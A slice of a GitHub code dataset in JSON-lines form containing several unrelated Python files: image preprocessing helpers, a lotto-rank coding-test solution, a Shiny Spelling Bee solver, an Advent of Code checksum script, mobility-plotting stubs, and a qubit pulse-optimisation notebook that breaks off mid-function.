\n tileGridSize = (8, 8)):\n clahe = cv.createCLAHE(clipLimit = clipLimit,\n tileGridSize = tileGridSize)\n # Convert the BGR images into the lab color spaces \n lab_image = cv.cvtColor(img, cv.COLOR_BGR2YUV)\n lab_image[:,:,0] = clahe.apply(lab_image[:,:,0])\n return cv.cvtColor(lab_image, cv.COLOR_YUV2BGR) \n \n ''' ---------------\n This method returns an bgr-image after using a standard \n histogram equalization with equalizeHist in the value plane,\n of the correspondig HSV-image.\n - img: the bgr-image which should be transformed\n ''' \n def get_EqualHist_img(self, img):\n img_hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n img_hsv[:,:,2] = cv.equalizeHist(img_hsv[:,:,2])\n return cv.cvtColor(img_hsv, cv.COLOR_HSV2BGR)\n\n ''' ---------------\n This method returns an bgr-image after using an Gaussian Blur\n onto it.\n '''\n def get_Gaussian_blurred_img(self,\n img,\n kernel_size = (3, 3),\n std_dev_x = 0.5,\n std_dev_y = 0.5\n ):\n img_blurred = cv.GaussianBlur(img, ksize = kernel_size, sigmaX = std_dev_x, sigmaY = std_dev_y)\n return img_blurred","repo_name":"ManneKo13/defect_detection","sub_path":"src/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":14602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18563559939","text":"def solution(lottos, win_nums):\n #우선, lottos와 win_nums중 맞는 것을 count\n #최고 당첨등급은 0이 맞았을 때\n #최저 당첨등급은 0이 틀렸을 때\n answer = []\n count_0 = 0\n count_match = 0\n \n #보이지 않는 숫자의 개수\n for i in lottos:\n if i == 0:\n count_0 += 1\n \n #일치하는 수의 개수\n for i in win_nums:\n if i in lottos:\n count_match += 1\n \n #최고 당첨등급\n max_rank = 7 - (count_0 + count_match)\n if max_rank == 7:\n max_rank = 6\n \n #최저 당첨등급\n min_rank = 7 - count_match\n if min_rank == 7:\n min_rank = 6\n \n answer.append(max_rank)\n answer.append(min_rank)\n \n return answer","repo_name":"bunedin81/coding_test","sub_path":"Programmers/로또의 최고 순위와 최저 순위.py","file_name":"로또의 최고 순위와 최저 순위.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18967533384","text":"from shiny import App, render, ui, reactive\nimport traceback\nfrom Solver import *\n\n\napp_ui = ui.page_fluid(\n ui.h2(\"Spelling Bee Solver\"),\n ui.input_text(id='puzzle', label='Puzzle (center letter first):', value='manitob', placeholder='abcdefg (center letter first)'),\n ui.input_action_button(\"solveit\", \"Solve Puzzle!\", class_=\"btn-success\"),\n ui.div(\"This may take a few seconds.\"),\n ui.h3(\"Pangrams\"),\n ui.output_text(\"pangrams\"),\n ui.h3(\"Solutions\"),\n ui.output_table(\"table\"),\n)\n\n\ndef server(input, output, session):\n @reactive.Calc\n @reactive.event(input.solveit, ignore_none=False)\n def getAllFoundWords():\n puzzleValue = input.puzzle()\n try:\n allFoundWords = solvePuzzle(puzzleValue)\n return allFoundWords\n except Exception as e:\n exceptionData = traceback.format_exc().splitlines()[-2:]\n ui.notification_show(\"\\n\".join(exceptionData), duration=None)\n raise e\n\n @output\n @render.table\n def table():\n return convertToDF(getAllFoundWords())\n\n @output\n @render.text\n @reactive.event(input.solveit, ignore_none=False)\n def pangrams():\n foundPangrams = findPangrams(puzzleValue=input.puzzle(), allFoundWords=getAllFoundWords())\n return \"\\n\".join(foundPangrams)\n\n\napp = App(app_ui, server)\n","repo_name":"kennethjmyers/SpellingBeeSolver","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70556229970","text":"with open('day_02.txt', 'r') as file:\n\trows = [row.split('\\t') for row in file]\n\tfor i in range(len(rows)):\n\t\tfor j in range(len(rows[i])):\n\t\t\trows[i][j] = int(rows[i][j])\n\nchecksum_1, checksum_2 = 0, 0\nfor row in rows:\n\tchecksum_1 += max(row) - min(row)\n\tdone_with_row = False\n\tfor i in range(len(row)):\n\t\tfor j in range(1,len(row)):\n\t\t\tnumer, denom = row[i], row[(i+j) % len(row)]\n\t\t\tif numer % denom == 0 or denom % numer == 0:\n\t\t\t\tchecksum_2 += max(numer // denom, denom // numer)\n\t\t\t\tdone_with_row = True\n\t\t\t\tbreak\n\t\tif done_with_row:\n\t\t\tbreak\n\nprint('part 1 checksum: '+ str(checksum_1))\nprint('part 2 checksum: '+ str(checksum_2))\n","repo_name":"johnakitto/advent_of_code","sub_path":"2017/day_02.py","file_name":"day_02.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32428812551","text":"import os\nimport collections\nimport itertools\nimport numpy as np\nimport pickle as pk\nimport ruptures as rpt\nimport seaborn as sns\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.colors as colors\nfrom collections import Counter, OrderedDict, defaultdict\nfrom itertools import chain\nfrom matplotlib.ticker import AutoMinorLocator\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nfrom statistics import mode\nfrom sklearn.linear_model import LinearRegression\nfrom scipy.stats import gaussian_kde\n\nimport utils as ut\nimport analysis as an\n\ncwd_path = os.getcwd()\n\ndef plot_visit_trajectory_outline(fullpath, nlocs, nagents_load=1000):\n \"\"\"\n Subplot 0: Scatter. Number of different visits vs. rho parameter.\n Subplot 1: Histogram. Number of different visits.\n Subplot 2: Scatter. Visit frequency for every location vs. rho parameter.\n Subplot 3: Histogram. Visit frequency.\n Subplot 4: Scatter. Top location visit frequency vs. rho parameter.\n Subplot 5: Histogram. Top location visit frequency.\n Subplot 6: Scatter. Home location visit frequency vs. rho parameter.\n Subplot 7: Histogram. Home location visit frequency.\n \"\"\"\n\n # Build trajectory data frame\n mob_df = an.build_trajectory_data_frame(fullname=fullpath, nagents_load=nagents_load)\n\n # Prepare data structures for plots\n nagents = nagents_load\n rho_a = np.zeros(nagents)\n freq_diff_visits_a = np.zeros(nagents)\n toploc_visits_a = np.zeros(nagents)\n home_visit_freq_a = np.zeros(nagents)\n loc_freq_visits_a = []\n\n # Compute data to be plotted\n for a in range(nagents):\n rho_a[a] = an.get_agent_rho(mob_df, a)\n \n traj_a = an.get_agent_trajectory(mob_df, a)\n t_max = len(traj_a)\n\n loc_freq_visits = []\n for l in traj_a:\n loc_freq_visits.append(an.compute_location_visits(traj_a, l))\n loc_freq_visits_a.append(loc_freq_visits)\n\n different_visits = len(set(traj_a))\n freq_diff_visits_a[a] = different_visits / t_max\n \n toploc = an.compute_most_visited_location(trajectory=traj_a)\n toploc_visits_a[a] = toploc[1] / t_max\n \n home = traj_a[0]\n home_visit_freq_a[a] = an.compute_location_visits(traj_a, home) / t_max\n\n # Prepare figure template\n fig, ax = plt.subplots(nrows=2, ncols=4, figsize=(20,8))\n title = 'Visits outline'\n fig.suptitle(title, fontsize=30)\n\n # SUBPLOT 00: Scatter. rho vs. freq_diff_visits_a\n ax[0, 0].scatter(rho_a, freq_diff_visits_a, color='teal')\n ax[0, 0].set_xlabel(r'$\\rho$', fontsize=25)\n ax[0, 0].set_ylabel(r'different visit rate $S/t_{{max}}$', fontsize=25)\n ax[0, 0].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 01: Histogram. freq_diff_visits_a\n density = True\n ax[0, 1].hist(freq_diff_visits_a, bins='auto', density=density, color='teal')\n ax[0, 1].set_xlabel(r'different visit rate $S/t_{{max}}$', fontsize=25)\n ax[0, 1].set_ylabel('norm. count', fontsize=25)\n ax[0, 1].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 02: Scatter. rho vs. loc_freq_visits_a\n max_locs = max(len(loc_freq_visits) for loc_freq_visits in loc_freq_visits_a)\n for a in range(nagents):\n rho_extend = np.full(max_locs, rho_a[a])\n ax[0, 2].scatter(rho_extend, loc_freq_visits_a[a])\n ax[0, 2].set_xlabel(r'$\\rho$', fontsize=25)\n ax[0, 2].set_ylabel(r'$f$', fontsize=25)\n ax[0, 2].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 03: Histogram. loc_frequ_visits_a\n flattened_loc_freq_visits = [visit for sublist in loc_freq_visits_a for visit in sublist]\n ax[0, 3].hist(flattened_loc_freq_visits, bins='auto', density=density, color='teal')\n ax[0, 3].set_xlabel(r'$f$', fontsize=25)\n ax[0, 3].set_ylabel('norm. count', fontsize=25)\n ax[0, 3].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 10: Scatter. rho vs. toploc_visits_a\n ax[1, 0].scatter(rho_a, toploc_visits_a, color='teal')\n ax[1, 0].set_xlabel(r'$\\rho$', fontsize=25)\n ax[1, 0].set_ylabel(r'$f_{{top}}$', fontsize=25)\n ax[1, 0].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 11: Histogram. toploc_visits_a\n ax[1, 1].hist(toploc_visits_a, bins='auto', density=density, color='teal')\n ax[1, 1].set_xlabel(r'$f_{{top}}$', fontsize=25)\n ax[1, 1].set_ylabel('norm. count', fontsize=25)\n ax[1, 1].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 12: Scatter. rho vs. home_visits_a\n ax[1, 2].scatter(rho_a, home_visit_freq_a, color='teal')\n ax[1, 2].set_xlabel(r'$\\rho$', fontsize=25)\n ax[1, 2].set_ylabel(r'$f_{{home}}$', fontsize=25)\n ax[1, 2].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 13: Histogram. home_visits_a \n ax[1, 3].hist(home_visit_freq_a, bins='auto', density=density, color='teal')\n ax[1, 3].set_xlabel(r'$f_{{home}}$', fontsize=25)\n ax[1, 3].set_ylabel('norm. count', fontsize=25)\n ax[1, 3].tick_params(axis='both', labelsize=15)\n\n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n\n plt.show()\n\ndef plot_visit_number_frequency(pars):\n\n # Load grid data\n\n # Transform grid data into trajectory dataframe\n\n # Load epidemic data\n pass\n\ndef plot_total_visits(fullpath, nagents_load=1000):\n \"\"\"\n Subplot 0: Total visits in every location (lattice structure preserved).\n Subplot 1: How many agents have a every location as top location. (lsp).\n Subplot 2: Unique visits to every location (how many different agents).\n \"\"\"\n \n # Prepare figure\n\n # Figure settings\n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' + ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\ndef plot_visit_frequency_and_attractiveness(full_path):\n \"\"\"\n Subplot 00: f_top-distribution for every agent\n Subplot 01: f_home-distribution for every agent\n Subplot 10: A_top-distribution for every agent\n Subplot 11: A_home-distribution for every agent\n \"\"\"\n \n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' + ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\ndef plot_first_time_visits(full_path):\n \"\"\"\n Subplot 00: Average visit time for every location\n Subplot 01: Average visit time of 25% visitors\n Subplot 02: Average visit time of 50% visitors\n Subplot 10: P25-time\n Subplot 11: P50-time\n Subplot 12: P75-time\n \"\"\"\n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' + ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\ndef plot_time_to_poles(full_path):\n \"\"\"\n Subplot 00: How many time to reach what became top location\n Subplot 01: How many time to reach 2-most visited\n Subplot 10: How many time to reach 50%-most visited\n Subplot 12: How many time to reach 75%-most visited\n \"\"\"\n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' + ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\ndef plot_rho_spatial_distribution(full_path):\n \"\"\"\n Subplot 0: spatial distribution\n Subplot 1: lower 95% CI\n Subplot 2: upper 95% CI\n \"\"\"\n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' + ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\n\ndef main():\n\n lower_path = 'data'\n filename = \"mdyna_gm0.21_hw25_t1200_rmBeta_ra2_rb2_space_amGaussian_aa0_ab10_bmFinite_np50_pmRandomCartesian_x50_y50_ts230626184935.pickle\"\n fullpath = os.path.join(cwd_path, lower_path, filename)\n #mob_df = an.build_trajectory_data_frame(fullname=fullpath, nagents_load=50000)\n \n plot_visit_trajectory_outline(fullpath, nlocs=2500, nagents_load=1000)\n\n \nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n","repo_name":"phononautomata/expidemics","sub_path":"src/plot_mobility.py","file_name":"plot_mobility.py","file_ext":"py","file_size_in_byte":10443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34708369593","text":"\n# coding: utf-8\n\n# # Optimization of qubit evolution\n\n# In[ ]:\n\n\n# NBVAL_IGNORE_OUTPUT\nget_ipython().run_line_magic('load_ext', 'watermark')\n#%load_ext autoreload\n#%autoreload 2\nimport qutip\nimport numpy as np\nimport scipy\nfrom ipywidgets import interact\nimport ipywidgets as widgets\nimport matplotlib\nimport matplotlib.pylab as plt\nimport krotov\nimport os\nimport copy\nimport subprocess\nfrom bisect import bisect_left\nimport matplotlib2tikz\nfrom scipy.signal import savgol_filter\nget_ipython().run_line_magic('matplotlib', 'notebook')\nget_ipython().run_line_magic('watermark', '-v --iversions')\nπ = np.pi\nsqrt = np.sqrt\nbasis = qutip.basis\ntensor = qutip.tensor\ncoherent = qutip.coherent\nfrom datetime import datetime\ndef current_time():\n return datetime.now().isoformat()[:16].replace('T',' ')\n\n\n# In[ ]:\n\n\nL = 3 # Truncated Hilbert space size\n\n\n# # Plotting and helper functions\n\n# In[ ]:\n\n\ndef to_two_level(state):\n if state.type is 'oper':\n return qutip.Qobj(state[0:2,0:2])\n else:\n return qutip.Qobj(state[0:2])\n\ndef plot_population(n, tlist):\n fig, ax = plt.subplots(figsize=(7.5,4))\n leg = []\n for i in range(len(n)):\n ax.plot(tlist, n[i], label=str(i))\n leg.append('$|'+str(i)+'\\rangle$')\n ax.legend()\n ax.set_xlabel('Time (ns)')\n ax.set_ylabel('Occupation')\n ax.legend([r'$|0\\rangle$',r'$|1\\rangle$',r'$|2\\rangle$'])\n #plt.show(fig)\n return fig\n\ndef plot_pulse(pulse, tlist, T=None, fig=None):\n if fig is None:\n fig, ax = plt.subplots(figsize=(7.5,4))\n else:\n ax = fig.axes[0]\n if callable(pulse):\n pulse = np.array([pulse(t, args=None) for t in tlist])\n if np.any(np.iscomplex(pulse)):\n ax.plot(tlist, np.real(pulse))\n ax.plot(tlist, np.imag(pulse))\n ax.legend(['Re', 'Im'])\n else:\n ax.plot(tlist, pulse)\n if T is not None:\n ax.plot(tlist, [S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n ax.plot(tlist, [-S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n ax.set_xlabel('Time (ns)')\n ax.set_ylabel('Pulse amplitude')\n ax.set_ylim([-pulse_max(0)*1.05,pulse_max(0)*1.05])\n #plt.show()\n return fig\n\ndef plot_system(ψ):\n bl = qutip.Bloch()\n bl.add_states(to_two_level(ψ.ptrace(0)))\n bl.show()\n qutip.visualization.plot_wigner_fock_distribution(to_two_level(ψ.ptrace(1)))\ndef plot_resonator(ψ):\n fig, ax = plt.subplots(1,len(ψ), figsize=(3*len(ψ),3))\n if len(ψ)<=1:\n ψ = ψ[0]\n axis = ax\n qutip.visualization.plot_wigner(ψ.ptrace(1), fig=fig, ax=axis, alpha_max = 2*α)\n axis.axis_equal = True\n else:\n for (ϕ, axis) in zip(ψ, ax):\n qutip.visualization.plot_wigner(ϕ.ptrace(1), fig=fig, ax=axis, alpha_max = 2*α)\n axis.axis_equal = True\n \ndef plot_cardinal(ψ):\n bl = qutip.Bloch()\n bl.vector_color = ['r','g','b','g','b','r']\n [bl.add_states(to_two_level(ϕ.ptrace(0)), 'vector') for ϕ in ψ]\n bl.show()\n return bl\n\ndef plot_all(dyn, ψ):\n ψ_i = [g.states[0] for g in dyn]\n ψ_f = [g.states[-1] for g in dyn]\n ψ_t = [ϕ[1] for ϕ in ψ]\n plot_cardinal(ψ_i)\n plot_resonator(ψ_i)\n plot_cardinal(ψ_t)\n plot_resonator(ψ_t)\n plot_cardinal(ψ_f)\n plot_resonator(ψ_f)\ndef plot_evolution(dyn, steps=1):\n for d in dyn:\n points = [to_two_level(s) for s in d.states[0:-1:steps]]\n bl = qutip.Bloch()\n bl.vector_color = 'r'\n bl.point_color = 'r'\n bl.point_marker = 'o'\n bl.add_states(points, 'point')\n bl.show()\n #bl = qutip.Bloch()\n #bl.vector_color = 'r'\n #bl.point_color = 'r'\n #bl.point_marker = 'o'\n #bl.view = [bl.view[0], 80]\n #bl.add_states(points, 'point')\n #bl.show()\n return bl\ndef get_objectives(T=None):\n if use_rotating:\n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in state_rot(ϕ, T)]\n else:\n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in ϕ]\n return objectives\ndef plot_matrix_final_target(target_state, final_state, xlabels, ylabels, el=30, az=135):\n fig, ax = qutip.visualization.matrix_histogram(final_state * target_state.dag(), xlabels, ylabels, colorbar=False, limits=[-1,1])\n qutip.visualization.matrix_histogram(proj(target_state), xlabels, ylabels, colorbar=False, limits=[-1,1], fig=fig, ax=ax)\n facecolors = np.zeros((6*L**2,4))*0.1\n edgecolors = np.tile([0,0,0,0.9], (6*L**2,1))\n ax.get_children()[2].set_facecolors(facecolors)\n ax.get_children()[2].set_edgecolors(edgecolors)\n ax.set_zticks(np.arange(-1,1,0.25))\n ax.view_init(elev=el, azim=az)\n return (fig, ax)\n\n\n# In[ ]:\n\n\ndef F_oc(fw_states_T, objectives, tau_vals=None, **kwargs):\n return np.abs(krotov.functionals.f_tau(fw_states_T, objectives, tau_vals, **kwargs))**2\n\ndef calc_fidelity(tau_vals):\n return np.abs(np.sum(tau_vals)/len(tau_vals))**2\n\ndef print_fidelity(**args):\n fid = calc_fidelity(np.array(args['tau_vals']))\n print(\" F_t = {} | F = {} | F_t - F = {}\".format(F_oc_tar, fid, F_oc_tar-fid))\ndef plot_fid_convergence(info_vals):\n fig, ax = plt.subplots(1,1)\n ax.plot(info_vals)\n ax.set_xticks(np.arange(0, len(info_vals), step=1))\n ax.set_xlabel('Iteration')\n ax.set_ylabel('Fidelity')\n #ax.set_ylim((-0.2,.2))\n plt.show()\ndef plot_fid_convergence(ax, info_vals, T):\n ax.plot3D(range(0,len(info_vals)), [T]*len(info_vals), info_vals)\n\n\n# In[ ]:\n\n\ndef qubit_occupation(dyn):\n occ = [basis(L,i)*basis(L,i).dag() for i in range(0,L)]\n n = qutip.expect(occ, dyn.states)\n fig = plot_population(n, dyn.times)\n return fig\n\ndef plot_norm(result):\n state_norm = lambda i: result.states[i].norm()\n states_norm=np.vectorize(state_norm)\n\n fig, ax = plt.subplots()\n ax.plot(result.times, states_norm(np.arange(len(result.states))))\n ax.set_title('Norm loss', fontsize = 15)\n ax.set_xlabel('Time (ns)')\n ax.set_ylabel('State norm')\n plt.show(fig)\n\n\n# In[ ]:\n\n\ndef plot_spectrum(pulse, tlist, mark_freq=None, pos=1, xlim=None, mark_color=['k','k','k'], fig = None, col=[0,0,0]):\n if fig is None:\n fig_new = True\n fig, ax = plt.subplots(figsize=(10,5))\n else:\n fig_new = False\n ax = fig.axes[0]\n samples = len(tlist)\n sample_interval = tlist[-1]/samples\n power_two = 2**20\n signal_qubit = np.pad(pulse, (0, power_two-samples), mode='constant')\n samples = power_two\n \n time = np.linspace(0, samples*sample_interval, samples)\n\n signal_spectrum = np.fft.fftshift(np.fft.fft(signal_qubit))\n freqs = np.fft.fftshift(np.fft.fftfreq(samples, d=sample_interval))\n\n \n start_idx = bisect_left(freqs, xlim[0]/(2*π))\n end_idx = bisect_left(freqs, xlim[1]/(2*π))\n ax.plot(freqs[start_idx:end_idx+1], np.abs(signal_spectrum[start_idx:end_idx+1])/len(signal_qubit),color=col) # in GHz\n if mark_freq is not None and fig_new is True:\n if not isinstance(mark_freq, list):\n mark_freq = [mark_freq]\n mf = np.array(mark_freq)/(2*π)\n if pos==1:\n ax.set_xlim(0, 2*mf[0])\n elif pos==-1:\n ax.set_xlim(-2*mf[0], 0)\n elif xlim is not None:\n ax.set_xlim(xlim[0]/(2*π), xlim[1]/(2*π))\n [ax.axvline(x=m_f, ymin=0, ymax=1, color=col, linestyle='--', linewidth=1) for (m_f, col) in zip(mf, mark_color)]\n #[ax.axvline(x=m_f, ymin=0, ymax=1, linestyle='--', linewidth=1) for (m_f, col) in zip(mf, mark_color)]\n ax.set_title('Pulse spectrum')\n ax.set_xlabel('f (GHz)');\n return fig\n\n\n# In[ ]:\n\n\ndef fid(result, target):\n return (np.abs((result.states[-1].dag()*target).full())**2)[0][0]\ndef proj(ψ, ϕ=None):\n if ϕ is None:\n return ψ * ψ.dag()\n else:\n return ψ * ϕ.dag()\n\n\n# In[ ]:\n\n\ndef plot_results_3d(results):\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ax.set_xlabel('Iteration')\n ax.set_zlabel('Fidelity')\n ax.set_ylabel('Pulse length')\n ax.set_zlim(0,1.1)\n for (r, T) in results:\n plot_fid_convergence(ax, r.info_vals[1:], T)\n ax.view_init(elev=20, azim=340)\n return (fig, ax)\n\ndef plot_results_iteration(results):\n fig = plt.figure()\n ax = plt.axes()\n ax.set_xlabel('Iteration')\n ax.set_ylabel('Fidelity')\n for (r, T) in results:\n ax.plot(range(0,len(r.info_vals)-1), r.info_vals[1:])\n #print('F = {}'.format(r.info_vals[-1]))\n return (fig, ax)\n\ndef plot_results_pulse_length_iterations(results):\n fig = plt.figure()\n ax = plt.axes()\n ax.set_xlabel('Pulse length (ns)')\n ax.set_ylabel('Iterations')\n x = [T for (r,T) in results]\n y = [r.iters[-1] for (r,T) in results]\n ax.stem(x, y)#, linestyle='None', color='k',marker='.')\n return (fig, ax)\n \ndef plot_results_pulse_length(results, iteration=-1, ax=None, shape='o',color='k'):\n if ax is None:\n ax = plt.axes()\n #else:\n #ax.clear()\n ax.set_xlabel('Pulse length')\n ax.set_ylabel('Fidelity')\n \n T_list = [T for (r, T) in results]\n fid_list = [r.info_vals[min(len(r.info_vals)-1,iteration)] for (r, T) in results]\n #for (r, T) in results:\n # it = \n \n ax.plot(T_list, fid_list, shape+color)\n ax.set_ylim(0,1.1)\n return ax\n\n\n# In[ ]:\n\n\ndef pulse_max(σ):\n A = 1.56246130414 # Chosen such that the integral of any Blackman pulse = π\n #A = A/2\n #A = 0.1\n σ = np.max((σ,3))\n return A/(np.sqrt(2*π)*σ)\n\n\n# # System setup\n\n# In[ ]:\n\n\nσ_max = 3 # ns (Gaussian pulse limit)\namp_max = pulse_max(0)\n# Below are settings for testing, optimization settings are set in the optimization section\nT = 18*2\nσ = T/6\nsteps = 4*int(np.ceil(T))\ntlist = np.linspace(0, T, steps)\n\n\n# ## Hamiltonian function\n\n# In[ ]:\n\n\nSi = qutip.operators.identity(L)\nZERO = qutip.operators.qzero(L)\n\nσ_z = proj(qutip.basis(L, 0)) - proj(qutip.basis(L, 1))\nσ_y = 1j*(proj(qutip.basis(L, 1),qutip.basis(L, 0)) - proj(qutip.basis(L, 0), qutip.basis(L, 1)))\nσ_x = proj(qutip.basis(L, 0),qutip.basis(L, 1)) - proj(qutip.basis(L, 1), qutip.basis(L, 0))\nb = qutip.operators.destroy(L)\nI = Si\n\nω_r = 8.3056 * 2 * π # resonator frequency\nω_q = 6.2815 * 2 * π # qubit frequency\nK_q = -2*π*297e-3 # Kerr qubit 200-300 MHz\n\n\nω_ef = ω_q + K_q\nω_gf = ω_q + K_q/2\n\nuse_rotating = True\ndef hamiltonian(ω=1.0, ampl0=1, use_rotating=True, pulses=None, tlist=None, start_pulse=None, T=1, phase=0, σ=σ):\n \"\"\"Two-level-system Hamiltonian\n \n Args:\n ω (float): energy separation of the qubit levels\n ampl0 (float): constant amplitude of the driving field\n \"\"\"\n \n K_r = 2*π*0.45e-3 # Kerr res\n #K_q = -2*π*297e-3 # Kerr qubit 200-300 MHz\n ω_r = 8.3056 * 2 * π # resonator frequency\n ω_q = 6.2815 * 2 * π # qubit frequency\n χ = 0.025 * 2 * π # parameter in the dispersive hamiltonian\n\n Δ = abs(ω_r - ω_q) # detuning\n g = sqrt(Δ * χ) # coupling strength that is consistent with chi\n γ = 1e1 # Dissipation (unused)\n \n #H_occ = w_r*a.dag()*a + w_q*b.dag()*b\n if L==3:\n H_occ_q = qutip.Qobj(np.diag([0, ω_q, 2*ω_q]))\n else:\n H_occ_q = qutip.Qobj(np.diag([0, ω_q]))\n #H_occ_r = ω_r * a.dag()*a\n H_occ = H_occ_q# + H_occ_r\n \n \n use_dispersive = True\n use_kerr = True\n #if use_dispersive:\n # #H_coup = - chi_qr * a.dag()*a * b.dag()*b\n # H_coup = χ * (a.dag()*a + I/2) * σ_z\n #else:\n #H_coup = g * (a.dag() * b + a * b.dag())\n # H_coup = g * σ_x *a.dag() + a\n if use_kerr:\n H_kerr = + K_q/2 * b.dag()**2 * b**2\n else:\n H_kerr = ZERO\n \n H_d = ZERO\n \n if use_rotating:\n H_d += H_kerr\n \n H_qr = (b.dag() + b)\n H_qi = 1j*(b.dag() - b)\n #H_rr = (a + a.dag())\n #H_ri = 1j*(a.dag() - a)\n \n if start_pulse is None:\n ϵ_qr = lambda t, args: ampl0\n ϵ_qi = lambda t, args: ampl0\n else:\n ϵ_qr = shape_field(lambda t, args: ampl0, start_pulse, T, σ)\n ϵ_qi = shape_field(lambda t, args: ampl0, start_pulse, T, σ)\n #ϵ_rr = lambda t, args: ampl0\n #ϵ_ri = lambda t, args: ampl0\n \n # Random pulses (doesn't really work)\n #ϵ = lambda t, tlist, R: R[np.where(tlist<=t)[0][-1]]\n #O = np.random.rand(len(tlist))\n #ϵ_qr = lambda t, args: ϵ(t, tlist, O)\n #O = np.random.rand(len(tlist))\n #ϵ_qi = lambda t, args: ϵ(t, tlist, O)\n \n \n if pulses:\n ϵ_qr = pulses[0]\n ϵ_qi = pulses[1]\n # ϵ_rr = np.zeros(len(pulses[0]))\n # ϵ_ri = np.zeros(len(pulses[0]))\n\n return [H_d, [H_qr, ϵ_qr], [H_qi, ϵ_qi]]#, [H_rr, ϵ_rr], [H_ri, ϵ_ri]]\n else:\n H_d += H_occ + H_kerr#+ H_coup\n \n H_q = b\n H_qc = b.dag()\n #H_rr = ZERO\n #H_ri = ZERO\n \n\n ϵ_q = lambda t, args: 1j*ampl0*np.exp(1j*ω_q*t)\n ϵ_qc = lambda t, args: -1j*ampl0*np.exp(-1j*ω_q*t)\n #ϵ_rr = lambda t, args: ampl0\n #ϵ_ri = lambda t, args: ampl0\n \n if pulses:\n ϵ_q = pulses[0]\n ϵ_qc = pulses[1]\n #ϵ_rr = np.zeros(len(pulses[0]))\n #ϵ_ri = np.zeros(len(pulses[0]))\n \n return [H_d, [H_q, ϵ_q], [H_qc, ϵ_qc]]#, [H_rr, ϵ_rr], [H_ri, ϵ_ri]]\n\n# Converts basis state coefficients into the corresponding states of the qubit-resonator system \ndef coeffs_to_state(c,init = True):\n if init:\n ψ = 